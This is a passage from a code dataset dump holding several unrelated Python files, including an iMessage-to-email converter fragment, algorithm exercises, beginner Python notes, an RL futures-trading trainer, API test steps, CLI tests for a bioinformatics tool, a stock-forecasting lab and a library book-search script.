max_attachment_size > 0):\n total_asize = 0\n for ia, a in enumerate(attachments):\n 
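# a is None when get_attachment_msg could not build a MIME part for it\n                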
if(not a):\n continue\n asize = len(a.as_bytes())\n if(asize > max_attachment_size):\n a = email.mime.text.MIMEText('Attachment \"%s\" suppressed due to '\n 'file-size constraints'%message['attachments'][ia]['raw_filename'])\n asize = len(a.as_bytes())\n elif(total_asize + asize > max_attachment_size):\n outer[Xheader('fragment')] = str(len(emails))\n emails.append(outer)\n new_message = copy.copy(message)\n new_message['guid'] = \\\n message['guid'] + '-FRAGMENT-' + str(len(emails))\n outer = email.mime.multipart.MIMEMultipart()\n set_headers(outer, new_message, addressbook, in_reply_to, sync_time)\n outer.preamble = 'You will not see this in a MIME-aware email reader.\\n'\n total_asize = 0\n outer.attach(a)\n total_asize += asize\n else:\n for a in attachments:\n if(a):\n outer.attach(a)\n if(emails):\n outer[Xheader('fragment')] = str(len(emails))\n emails.append(outer)\n return emails\n else:\n return outer\n else:\n outer = get_text_msg(message)\n set_headers(outer, message, addressbook, in_reply_to, sync_time)\n return outer\n\ndef update_chat_thread_ids(message, addressbook, in_reply_to):\n chat_id = get_chat_id(message['chat'], addressbook)\n in_reply_to[chat_id] = get_message_id(message)\n","repo_name":"sfegan/imessage_sync","sub_path":"imessage_to_mime.py","file_name":"imessage_to_mime.py","file_ext":"py","file_size_in_byte":10581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"21452552255","text":"import time\n\n\ndef timing(func):\n def wrapper(*args, **kwargs):\n t1 = time.time()\n res = func(*args, **kwargs)\n t2 = time.time()\n result = t2 - t1\n print(f\"Func {func.__name__} took {result:.9f} sec.\")\n return res\n\n return wrapper\n\n\ndef generate_parentheses1(n):\n \"\"\"the slowest\"\"\"\n if n == 0:\n return [\"\"]\n result = []\n for i in range(n):\n left = generate_parentheses1(i)\n\n right = generate_parentheses1(n - i - 1)\n\n for l in left:\n for r in right:\n result.append(\"(\" + l + \")\" + r)\n return sorted(result)\n\n\n@timing\ndef run_gen1(n):\n generate_parentheses1(n)\n\n\nrun_gen1(14)\n\n\n@timing\ndef generate_parentheses2(n):\n output = []\n\n def rec(left, right, stack, candidate):\n if left == right == 0:\n output.append(candidate)\n return\n if left > 0:\n rec(left - 1, right, stack + 1, candidate + \"(\")\n if right > 0 and stack > 0:\n rec(left, right - 1, stack - 1, candidate + \")\")\n\n rec(n, n, 0, candidate=\"\")\n return output\n\n\ng = generate_parentheses2(15)\n\n\n@timing\ndef generate_parentheses3(n) -> None:\n out = []\n\n def run(current: str, opened: int, closed: int, n: int):\n if len(current) == 2 * n:\n out.append(current)\n return\n if opened < n:\n run(current + \"(\", opened + 1, closed, n)\n if closed < opened:\n run(current + \")\", opened, closed + 1, n)\n\n run(\"\", 0, 0, n)\n return out\n\n\ng = generate_parentheses3(14)\nprint(len(g))\n\n\nres = []\n\n\ndef generate_parentheses4(current: str, opened: int, closed: int, n: int):\n \"\"\"just printout algorithm\"\"\"\n if len(current) == 2 * n:\n res.append(current)\n return\n if opened < n:\n generate_parentheses4(current + \"(\", opened + 1, closed, n)\n if closed < opened:\n generate_parentheses4(current + \")\", opened, closed + 1, n)\n\n\n@timing\ndef run_gen4(n):\n generate_parentheses4(\"\", 0, 0, 
n)\n\n\nrun_gen4(3)\nprint(len(res))\n","repo_name":"movalex/yandex-code","sub_path":"generate_parentheses.py","file_name":"generate_parentheses.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"70098888480","text":"import math\n\nprint(\"If/Elif/Else Statements\")\nname = 12243\n# name = \"John\"\n# name = False\nif type(name) == str:\n    print(\"Your name is {0}\".format(name))\nelif type(name) == bool:\n    print(\"Your name can't be a Boolean\")\nelse:\n    print(\"Your name must be a String\")\n    \nprint(\"\\r\\nDetermining Position on a Number Line\")\nfor x in range(10):\n    if x <= 3:\n        print(x, \" is less than or equal to 3\")\n    elif x > 5:\n        print(x, \" is greater than 5\")\n    else:\n        print(x, \" is 4 or 5\")\n    \nprint(\"\\r\\nSum of Even and Sum of Odd Numbers\")\nN = 100\neven = 0\nodd = 0\nfor i in range(N):\n    if i % 2 == 0:\n        even += i\n    else:\n        odd += i\nprint(\"Even Sum: \", even)\nprint(\"Odd Sum: \", odd)\n\n\n\nprint(\"\\r\\nWhile Loop\")\ni = 0\nwhile i < 10:\n    print(\"i = \", i)\n    i += 1\nelse:\n    print(\"The last value was \", i)\n    \nprint(\"\\r\\nE2.22: Euclid's Algorithm\")\na, b = 1071, 462\nwhile b:\n    # b is True while > 0\n    print(\"a = {0:4}\\tb = {1:4}\\ta % b = {2:4}\".format(a, b, a % b))\n    # {0:4} in the above will limit the length of the string to 4\n    a, b = b, a % b\nprint(\"Greatest common divisor = \", a)\n\nprint(\"\\r\\nP2.5.2\")\nH = 0\nc = 0.01\nKa = 1.78e-5\nTOL = 1e-10\ndPH = 1\ncounter = 0\nwhile dPH > TOL:\n    Hp = math.sqrt(Ka * (c - H))\n    dPH = Hp - H\n    H = Hp\n    counter += 1\n    if counter > 100:\n        break\nprint(\"PH: {0:.2f}\".format(-math.log(H, 10)))\n\n\n\nprint(\"\\r\\nBreak Command\")\n# Ends loop\ni = 0\nwhile True:\n    i += 1\n    if i % 2 == 0:\n        print(i, \" is even\")\n    else:\n        print(i, \" is odd\")\n    if i >= 10:\n        break\n    \nprint(\"\\r\\nPass Command\")\n# Skips over a section\nfor i in range(10):\n    if i % 2 == 0:\n        pass\n    else:\n        print(i, \" is odd\")\n    \nprint(\"\\r\\nContinue Command\")\n# Ends current iteration and moves on to the next\nfor i in range(10):\n    if i % 2 == 0:\n        continue\n    else:\n        print(i, \" is odd\")\n    \n    \n    \nprint(\"\\r\\nQ2.5.1\")\na = [2, 4, 10, 6, 8, 4]\nlow = min(a)\nhigh = max(a)\nout = []\nfor i in a:\n    out.append((i - low) / (high - low))\nprint(out)","repo_name":"acbarker19/PHY299-Class-Assignments","sub_path":"Notes/notes_conditional_statements.py","file_name":"notes_conditional_statements.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"21913456805","text":"'''\nRaising your own errors with raise\n\n*NOTE: raise is not a function, but a reserved keyword (like def)\n\nraise -> raises exceptions\n\nIt is useful for creating our own exceptions and error messages\n\nHow to use it:\n\nraise ErrorType('error message')\n\n\nNOTE: raise, just like return, ends the function block. That is, nothing can be executed\nafter the raise statement runs\n'''\n\n#raise ValueError('Incorrect value')\n\nprint('\\n')\n\n# Examples:\n\ndef colore(texto, cor):\n    cores = ('green', 'yellow', 'red', 'blue')\n    if type(texto) is not str:\n        raise TypeError('Text must be a string')\n    if cor not in cores:\n        raise ValueError('Color not allowed')\n    if type(cor) is not str:\n        raise TypeError('Color must be a string')\n    return f'The text {texto} is in the color {cor}'\n\n\nprint(colore('Felipe', 'green'))\nprint(colore('Cesar', 'red'))\nprint(colore('Camila', 'gray')) # ValueError: Color not allowed\n\n#print(colore('Felipe', 6)) # TypeError: Color must be a string\n\nprint(colore(4, 'blue')) # TypeError: Text must be a string","repo_name":"feliperfdev/100daysofcode-1","sub_path":"Introdução ao Python/week2/day11/levantando_erros.py","file_name":"levantando_erros.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"70078693918","text":"import random\r\nimport threading\r\nimport time\r\n\r\n\r\ndef list_append(count, id, out_list):\r\n    for i in range(count):\r\n        out_list.append(random.random())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    start_time = time.time()\r\n\r\n    for xx in range(0, 50):\r\n        size = 3000000\r\n        threads = 8 # we will run 8 threads\r\n\r\n        jobs = []\r\n        for i in range(0, threads):\r\n            out_list = list()\r\n            thread = threading.Thread(target=list_append, args=(size, i, out_list)) # Create a thread object with its target and arguments\r\n            jobs.append(thread)\r\n\r\n        # Start the threads (i.e. calculate the random number lists)\r\n        for j in jobs:\r\n            j.start()\r\n\r\n        # Ensure all of the threads have finished\r\n        for j in jobs:\r\n            j.join()\r\n\r\n    '''Time the program'''\r\n    print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n","repo_name":"hz336/Algorithm","sub_path":"LeetCode/Design/! threading.py","file_name":"! 
threading.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42244167384","text":"\n\nfrom pprint import pprint\nfrom .envs import FuturesEnvV3_1 as FuturesEnv\nfrom .algos import Algos\nimport gym\nfrom ray import air, tune\nfrom ray.air.result import Result\nfrom ray.air.callbacks.wandb import WandbLoggerCallback\nimport ray\nfrom datetime import date, datetime\n\nfrom utils.utils import Interval, max_step_by_day\nfrom utils.api import API\n# from .envs import FuturesEnvV2_2 as FuturesEnv\n\nclass RLTrainer:\n def __init__(self, account: str = \"a4\", train_type: str = \"tune\"):\n print(\"Initializing RL trainer\")\n auth = API(account=account).auth\n self.train_type = train_type # tune or train\n self.algo_name = \"A3C\"\n\n self.wandb_name = self.algo_name + \"_\" + datetime.now().strftime(\n \"%Y-%m-%d_%H-%M-%S\") if self.train_type == \"train\" else False\n self.project_name = \"futures-alpha-8\"\n INTERVAL = Interval()\n self.interval = INTERVAL.ONE_SEC\n self.max_steps = max_step_by_day[self.interval]\n self.training_iteration = dict({\n INTERVAL.ONE_MIN: 100,\n INTERVAL.FIVE_SEC: 400,\n INTERVAL.ONE_SEC: 500,\n })\n # only trainer mode will log to wandb in env\n self.env_config = {\n \"auth\": auth,\n \"symbols\": [\"cotton\"],\n # \"symbols\": [\"sliver\"],\n \"start_dt\": date(2016, 1, 1),\n \"end_dt\": date(2022, 8, 1),\n \"live_market\": False,\n \"live_account\": None,\n \"wandb\": self.wandb_name,\n \"is_offline\": True,\n \"max_sample_size\": 1e6,\n \"project_name\": self.project_name,\n \"interval\": self.interval,\n \"max_steps\": self.max_steps,\n \"high_freq\": True,\n }\n self.env = FuturesEnv\n\n ray.init(logging_level=20, num_cpus=62, num_gpus=1, include_dashboard=False)\n\n def train(self,):\n is_tune = self.train_type == \"tune\"\n algos = Algos(name=self.algo_name, env=self.env,\n env_config=self.env_config, is_tune=is_tune)\n if is_tune:\n # use tuner\n stop = {\n \"training_iteration\": self.training_iteration[self.interval],\n \"episode_reward_min\": 1,\n }\n cb = [WandbLoggerCallback(\n project=self.project_name,\n group=\"tune_\" + self.interval,\n log_config=True,\n )]\n tuner = tune.Tuner(self.algo_name, param_space=algos.config,\n run_config=air.RunConfig(\n verbose=1,\n stop=stop,\n checkpoint_config=air.CheckpointConfig(\n checkpoint_frequency=100),\n callbacks=cb\n ))\n results = tuner.fit()\n metric = \"episode_reward_mean\"\n best_result: Result = results.get_best_result(metric, mode=\"max\")\n print(\"Best result:\", best_result)\n print(\"Checkpoints path:\", best_result.best_checkpoints)\n else:\n # use trainer\n trainer = algos.trainer\n print(algos.config)\n for i in range(self.training_iteration[self.interval]*10):\n result = trainer.train()\n self.logging(result)\n if i % 500 == 0:\n print(pprint(result))\n checkpoint = trainer.save(checkpoint_dir=\"checkpoints\")\n print(\"checkpoint saved at\", checkpoint)\n ray.shutdown()\n\n def run(self, checkpoint_path, max_episodes: int = 1000):\n trainer = Algos(name=self.algo_name, env=self.env,\n env_config=self.env_config, train_type=self.train_type).trainer\n trainer.restore(checkpoint_path)\n print(\"Restored from checkpoint path\", checkpoint_path)\n\n env = gym.make(self.env, config=self.env_config)\n obs = env.reset()\n\n step = 0\n while step < max_episodes:\n action = trainer.compute_single_action(obs)\n obs, reward, done, info = env.step(action)\n info[\"reward\"] = reward\n if done:\n 
step += 1\n obs = env.reset()\n ray.shutdown()\n\n def logging(self, result):\n print(\"timers\", result['timers'])\n print(\"info\", result['info'])\n # print(\"sampler_results\", result['sampler_results'])\n # def wandb_log(result):\n # wandb.config.update({result['config']})\n # for k in result['info'].keys():\n # wandb.log(data={\"info/\" + k: result['info'][k]})\n # wandb.log(\n # data={\"info/num_agent_steps_trained\": result['num_agent_steps_trained']})\n # for k in result['sampler_perf'].keys():\n # wandb.log(data={\"sampler_perf/\" +\n # k: result['sampler_perf'][k]})\n # for k in result['sampler_results'].keys():\n # wandb.log(\n # data={\"sampler_results/\" + k: result['sampler_results'][k]})\n\n def predict(self):\n pass\n\n def save(self):\n pass\n\n def load(self):\n pass\n","repo_name":"dyllanwli/cta-rl-tqsdk","sub_path":"src/policies/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"24786282656","text":"import json\nimport os\nimport requests\nfrom jsonschema import validate\nfrom behave import given, when, then, step\n\nBASE_URL = 'http://www.alphavantage.co/query?'\nSCHEMA_PATH = os.getcwd() + '/Schema/'\nhttp_request_header = {}\nhttp_request_body = {}\nglobal_general_variables = {}\n\n\n@when('I retrieve the results')\ndef step_impl(context):\n context.status_code = global_general_variables['response_full'].status_code\n context.data = global_general_variables['response_full'].json()\n\n\n@given('Set HEADER param request content type as \"{header_content_type}\"')\ndef step_impl(context, header_content_type):\n http_request_header['content-type'] = header_content_type\n\n\n@given('Set HEADER param response accept type as \"{header_accept_type}\"')\ndef step_impl(context, header_accept_type):\n http_request_header['Accept'] = header_accept_type\n\n\n@then('the status code should be \"{status_code}\"')\ndef step_impl(context, status_code):\n assert (int(global_general_variables['response_full'].status_code) == int(status_code))\n\n\n@when('I Raise \"{http_request_type}\" HTTP request with endpoint \"{endpoint}\"')\ndef step_impl(context, http_request_type, endpoint):\n end_url = BASE_URL\n if 'GET' == http_request_type:\n end_url += endpoint\n global_general_variables['response_full'] = requests.get(end_url)\n elif 'POST' == http_request_type:\n global_general_variables['response_full'] = requests.post(end_url,\n headers=http_request_header,\n data=http_request_body)\n\n\n@then('Response HEADER content type should be \"{expected_response_content_type}\"')\ndef step_impl(context, expected_response_content_type):\n assert (expected_response_content_type == global_general_variables['response_full'].headers['Content-Type'])\n\n\n@then('it should have the field \"{field}\"')\ndef step_impl(context, field):\n assert (field in context.data)\n\n\n@then('request structure corresponds to the scheme \"{schema_file}\"')\ndef step_impl(context, schema_file):\n with open(SCHEMA_PATH + schema_file, 'r', encoding='utf-8') as f:\n file = json.load(f)\n validate(context.data, file)\n","repo_name":"ramukunireddy6/python-bdd-automation","sub_path":"feature/steps/step_def.py","file_name":"step_def.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40179899036","text":"import logging\nimport os\n\nimport click\n\nimport pytest\n\nimport ymp\ncfg = 
ymp.get_config()\n\nlog = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef test_submit_no_profile(invoker):\n \"Running submit without profile should raise UsageError\"\n with pytest.raises(click.UsageError):\n invoker.call(\"submit\")\n\n\ndef test_submit_profile_cfg(invoker, saved_tmpdir):\n \"Test profile set from config\"\n with open(\"ymp.yml\", \"w\") as ymp_yml:\n ymp_yml.write(\"cluster:\\n profile: dummy\")\n invoker.call(\"submit\", cfg.dir.reports)\n assert os.path.isdir(cfg.dir.reports)\n\n\n# - don't test profiles that have no command set on them (default profile)\n# - sort profiles so we can test in parallel reliably\nprofiles = sorted((name, profile)\n for name, profile in cfg.cluster.profiles.items()\n if profile.get('command'))\n\n\n@pytest.mark.parametrize(\n \"mock_cmd,prof_name,prof_cmd\",\n [((profile.command.split()[0], '#!/bin/bash\\nexec \"$@\"\\n'),\n name, profile.command)\n for name, profile in profiles],\n ids=[name for name, profile in profiles],\n indirect=['mock_cmd'])\ndef test_submit_profiles(invoker, mock_cmd, prof_name, prof_cmd):\n invoker.call(\"submit\",\n \"--profile\", prof_name,\n \"--command\", prof_cmd,\n cfg.dir.reports)\n assert os.path.isdir(cfg.dir.reports)\n\n\ndef test_show(invoker, saved_tmpdir):\n \"Test parts of show\"\n with open(\"ymp.yml\", \"w\") as cfg:\n cfg.write(\"conda:\\n testme: [X1,X2]\")\n\n invoker.call(\"show\")\n res = invoker.call(\"show\", \"pairnames\")\n assert res.output.strip() == '- R1\\n- R2'\n res = invoker.call(\"show\", \"pairnames[1]\")\n assert res.output.strip() == 'R2'\n res = invoker.call(\"show\", \"cluster.profiles.default.drmaa\")\n assert res.output.strip() == 'False'\n\n res = invoker.call(\"show\", \"conda.testme\")\n assert res.output.strip() == '- X1\\n- X2'\n\n\ndef test_stage_list(invoker):\n \"List all stages\"\n res = invoker.call(\"stage\", \"list\")\n assert \"\\ncheck \" in res.output\n\n with pytest.raises(click.UsageError):\n res = invoker.call(\"stage\", \"list\", \"-s\", \"-l\")\n\n res = invoker.call(\"stage\", \"list\", \"does_not_exist\")\n assert res.output == \"\"\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-s\")\n assert res.output.strip() == \"check\"\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-l\")\n assert res.output.startswith(\"check\")\n assert res.output.count(\"\\n\") > 3\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-c\")\n assert res.output.startswith(\"check\")\n assert \"test.rules:\" in res.output\n assert res.output.count(\"\\n\") == 3\n\n\ndef test_func_get_envs():\n \"Test env cli helper function get_envs\"\n from ymp.cli.env import get_envs\n cfg.unload()\n\n envs = get_envs()\n log.debug(\"envs found: %s\", envs)\n assert 'bbmap' in envs\n assert 'bmtagger' in envs\n\n envs = get_envs('bbmap')\n assert len(envs) == 1\n\n envs = get_envs(['bbmap', 'bmtagger'])\n assert len(envs) == 2\n\n envs = get_envs(['bb?ap', 'bmtagger*'])\n assert len(envs) == 2\n\n\ndef test_env_list(invoker):\n \"\"\"Test listing environments\n\n - w/o args\n - reverse sorted\n - sorted by hash\n \"\"\"\n res = invoker.call(\"env\", \"list\")\n lines = res.output.splitlines()\n assert len(lines) > 2\n assert lines[0].startswith(\"name\"), \"first row should start with name\"\n assert all(lines[i].upper() <= lines[i+1].upper()\n for i in range(2, len(lines)-1)), \\\n f\"output should be sorted: {lines}\"\n\n res = invoker.call(\"env\", \"list\", \"-r\")\n lines = res.output.splitlines()\n assert all(lines[i].upper() >= 
lines[i+1].upper()\n for i in range(1, len(lines)-1)), \\\n f\"output should be sorted reverse:\\n{lines}\"\n\n res = invoker.call(\"env\", \"list\", \"-s\", \"hash\")\n lines = res.output.splitlines()\n hash_col = lines[0].split().index(\"hash\")\n hashes = [line.split()[hash_col] for line in lines]\n assert all(hashes[i] <= hashes[i+1]\n for i in range(1, len(lines)-1)), \\\n f\"output should be sorted by hash:\\n{hashes[1:]}\"\n\n\ndef test_env_prepare(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test passing through to snakemake prepare\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\")\n res = invoker.call(\"env\", \"list\", \"bbmap\")\n lines = res.output.splitlines()\n col = lines[0].index(\"installed\")\n assert lines[1][col:col+len(\"False\")] == \"False\"\n invoker.initialized = False\n res = invoker.call(\"env\", \"prepare\", \"toy.trim_bbmap\")\n\n res = invoker.call(\"env\", \"list\", \"bbmap\")\n lines2 = res.output.splitlines()\n col = lines2[0].index(\"installed\")\n assert lines2[1][col:col+len(\"True\")] == \"True\", \"\\n\".join(lines + lines2)\n\n conda_cmd = mock_conda.calls[-1]\n assert \"conda create\" in conda_cmd\n assert \"/bbmap-\" in conda_cmd\n\n\ndef test_env_install(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test installing environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n # basic\n res = invoker.call(\"env\", \"install\", \"bbmap\")\n assert \"Creating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n n_calls = len(mock_conda.calls)\n\n # no double install\n res = invoker.call(\"env\", \"install\", \"bbmap\")\n assert len(mock_conda.calls) == n_calls\n\n # remove bbmap env\n res = invoker.call(\"env\", \"remove\", \"bbmap\")\n\n # multiple, globbing\n res = invoker.call(\"env\", \"install\", \"bb?ap\", \"bbma*\")\n assert \"Creating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n assert len(mock_conda.calls) == n_calls + 1\n\n # dynamic env\n res = invoker.call(\"env\", \"install\", \"sickle\")\n assert \"Creating 1 environments\" in res.output\n assert \"'sickle'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n\n\ndef test_env_update(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test updating environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n # basic\n res = invoker.call(\"env\", \"update\", \"bbmap\")\n assert \"Updating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"conda create\" in mock_conda.calls[-2]\n assert \"conda env update\" in mock_conda.calls[-1]\n\n\ndef test_env_export(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test exporting environments\"\"\"\n # install envs locally\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n # skip and create are mutually exclusive\n with pytest.raises(click.UsageError) as exc:\n invoker.call(\"env\", \"export\", \"-sc\", \"bbmap\")\n assert exc.match(\"mutually exclusive\")\n\n # fail if trying to export uninstalled env\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"bbmap\")\n assert exc.match(\"uninstalled\")\n\n # 
exporting nothing\n res = invoker.call(\"env\", \"export\", \"-qs\", \"bbmap\")\n assert res.output == \"\"\n\n # creating bbmap.yml\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\", \"-c\")\n assert \"Exporting\" in res.output\n\n # fail, file exists\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\")\n assert exc.match(\"exists\")\n\n # allow overwrite\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\", \"-f\")\n assert \"Exporting\" in res.output\n\n # try txt format and export to file\n res = invoker.call(\"env\", \"export\", \"-d\", \"bbmap.txt\", \"bbmap\")\n assert \"conda list\" in mock_conda.calls[-1]\n\n # export multiple, fail\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"-cd\", \".\", \"bbmap\", \"sambamba\")\n assert exc.match(\"exists\")\n\n # export multiple\n res = invoker.call(\"env\", \"export\", \"-fcd\", \".\", \"bbmap\", \"sambamba\")\n assert \"Exporting 2 \" in res.output\n\n # export multiple to stdout\n res = invoker.call(\"env\", \"export\", \"-q\", \"bbmap\", \"sambamba\")\n names = [line[6:] for line in res.output.splitlines()\n if line.startswith(\"name: \")]\n assert sorted(names) == [\"bbmap\", \"sambamba\"]\n\n # export no matching patterns\n res = invoker.call(\"env\", \"export\", \"does_not_match_anything\")\n assert \"Nothing to export\" in res.output\n\n # export everything installed\n res = invoker.call(\"env\", \"export\", \"-s\")\n names = [line[6:] for line in res.output.splitlines()\n if line.startswith(\"name: \")]\n assert sorted(names) == [\"bbmap\", \"sambamba\"]\n\n\ndef test_env_clean(invoker, demo_dir, mock_conda):\n \"\"\"Test cleaning environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n\ndef test_env_activate(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test activating an environment\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n res = invoker.call(\"env\", \"activate\", \"bbmap\")\n assert str(demo_dir) in res.output\n\n\ndef test_env_run(invoker, demo_dir, mock_conda, mock_downloader, capfd):\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"run\", \"bbmapx\", \"bbmap.sh\")\n assert exc.value.message == \"Environment bbmapx unknown\"\n\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"run\", \"*\", \"bbmap.sh\")\n assert exc.value.message.startswith(\"Multiple environments match\")\n\n res = invoker.call(\"env\", \"run\", \"bbmap\", \"true\")\n assert res.exit_code == 0\n cap = capfd.readouterr()\n assert \"bin/activate: No such file \" in cap.err\n\n\n@pytest.mark.parametrize(\n \"comp_words,exp_len,exp_res\",\n [\n [\"ymp make\", 6, {\n \"toy\", \"toy.\", \"mpic\", \"mpic.\"\n }],\n [\"ymp make t\", 2, {\n \"toy\", \"toy.\"\n }],\n [\"ymp make toy.\", -1, {\n \"toy.assemble_\", \"toy.trim_\"\n }],\n [\"ymp make toy.assemble_\", -1, {\n \"toy.assemble_megahit\",\n \"toy.assemble_megahit.\"\n }],\n [\"ymp make toy.assemble_megahit.\", -1, {\n \"toy.assemble_megahit.trim_\",\n \"toy.assemble_megahit.map_\"\n }],\n [\"ymp make toy.assemble_megahit.map_\", -1, {\n \"toy.assemble_megahit.map_bbmap\",\n }],\n [\"ymp make toy.map_bowtie2.\", 0, set()],\n 
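# this prefix is expected to produce no completions\n        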
[\"ymp make toy.group_\", 16, {\n \"toy.group_name\", \"toy.group_Subject\",\n \"toy.group_name.\", \"toy.group_Subject.\",\n \"toy.group_ALL.\", \"toy.group_ALL\",\n }],\n ]\n)\ndef test_completion(\n # fixtures:\n invoker, demo_dir, capfd, envvar,\n # parameters:\n comp_words, # command line prefix to expand\n exp_len, # expected number of result options (or -1)\n exp_res # (subset of) expected result options\n):\n import subprocess as sp\n envvar('YMP_DEBUG_EXPAND', 'stderr')\n envvar('_YMP_COMPLETE', 'complete-bash')\n envvar('COMP_CWORD', '2')\n envvar('COMP_WORDS', comp_words)\n sp.run([\"python\", \"-m\", \"ymp\"])\n cap = capfd.readouterr()\n result = set(cap.out.split())\n\n if exp_len != -1:\n assert len(result) == exp_len, \\\n f\"Expected {exp_len} results for '{comp_words}' but got\" \\\n f\" {len(result)}:\\n\" \\\n f\"{result}\"\n\n assert exp_res.issubset(result), \\\n f\"Completion for '{comp_words}' is missing: {exp_res - result}\"\n","repo_name":"epruesse/ymp","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":11887,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"51"} +{"seq_id":"15292242434","text":"\"\"\"\nЛабораторная работа №14 - Моделирование.\nВ данной лабораторной работе использованы средства языка Python для\nанализа и прогнозирования стоимости акций компаний (построение финансовой модели).\n\"\"\"\n\nfrom stocker.stocker import Stocker\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n microsoft = Stocker('MSFT')\n # Вывод графика стоимости акций компании Microsoft\n microsoft.plot_stock()\n microsoft.plot_stock(start_date='2000-01-03', end_date='2018-01-16', stats=['Daily Change', 'Adj. Volume'], plot_type='pct')\n microsoft.buy_and_hold(start_date='1986-03-13',\n end_date='2018-01-16', nshares=100)\n model, model_data = microsoft.create_prophet_model()\n # model и model_data из предыдущего вызова функций\n model.plot_components(model_data)\n plt.show()\n print(microsoft.weekly_seasonality)\n microsoft.weekly_seasonality = True\n print(microsoft.weekly_seasonality)\n model, future = microsoft.create_prophet_model(days=2000)","repo_name":"webclinic017/LabsAiVD","sub_path":"Lab14/lr14.py","file_name":"lr14.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10407202311","text":"###booksearch funtions\nfrom Database import *\nstring_search =[]\nbook_by_string=[]\nBook_found = \"None\"\ndef booksearch(bookrequest):\n '''\nThis function allows the user to search for a book, in the system.\nThis is through user input by the librarian. The librarian must either\nenter the entire name of the book or a phrase e.g. 
\"Lord of the rings\",\"lord\" or \"rings\"\nin order to get a match.\n'''\n occur = 0\n found = 3\n f=open(\"Database.txt\",\"r\")\n for line in f:\n line = line.strip()\n line = line.split(',')\n #adds books the database so that they can be critique\n book_database.append([str(line[0].replace('[','')),line[1],line[2],line[3],line[4],str(line[5].replace(']','') )])\n Books = [i[1].replace('\"',\"\").strip().lower() for i in book_database] #takes all the book titles and removes the white space\n # and also makes everything lowercase for validation\n search = bookrequest.split(\" \") # splits up the users input into a list of individual words\n search =[i.lower() for i in search]# makes each book lowercase\n if \"the\" in search:\n search.remove(\"the\") #removes the word 'the' from the search as it is a generic word\n if \"of\" in search:\n search.remove(\"of\") #removes the word 'of' from the search as it is a generic word\n #and slows down the search process\n for book in Books:\n book_by_string.append(book.split(\" \"))\n for item in book_by_string: #the code checks every element in book_by_String and checks across each word in the search list\n for j in search:\n if j in item:\n occur = occur +1\n if occur == 1:\n global Book_found\n Book_found = \" \".join(item) #once its found the book it joins the list of words together again but as a sentence\n confirm =input(\"Did you mean %s: \"%(Book_found))#validates it has found the right book\n if confirm.lower() == \"yes\":\n for i in book_database:\n if (i[1].lower()).strip() == Book_found and (i[3].strip() == \"'In Stock'\" or i[3].strip() == '\"In Stock\"'):\n found = 1\n #if the user inputs yes the book matches with the book in the database\n # prints that this book is in stock, if the loan_status is equal to \"In stock\"\n elif (i[1].lower()).strip() == Book_found and (i[3].strip() == \"'Out on 